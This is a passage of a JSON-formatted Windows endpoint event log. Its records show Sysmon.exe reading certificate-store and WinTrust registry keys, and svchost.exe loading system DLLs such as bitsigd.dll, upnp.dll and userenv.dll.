"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bitsigd.dll", - "image_path": "C:\\Windows\\System32\\bitsigd.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - 
"timestamp": 131883570878080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "upnp.dll", - "image_path": "C:\\Windows\\System32\\upnp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 
131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - 
"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "userenv.dll", - "image_path": "C:\\Windows\\System32\\userenv.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 